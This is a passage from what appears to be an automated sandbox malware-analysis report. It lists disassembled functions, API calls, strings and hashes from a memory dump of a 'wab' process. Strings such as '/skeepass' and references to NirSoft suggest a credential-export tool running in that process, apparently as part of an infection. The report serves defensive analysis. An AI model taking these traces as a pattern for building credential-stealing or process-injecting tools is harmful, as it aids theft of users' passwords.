                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                          • API String ID: 4233704886-1717621600
                                                                                                                                                                                                          • Opcode ID: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                                                                                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
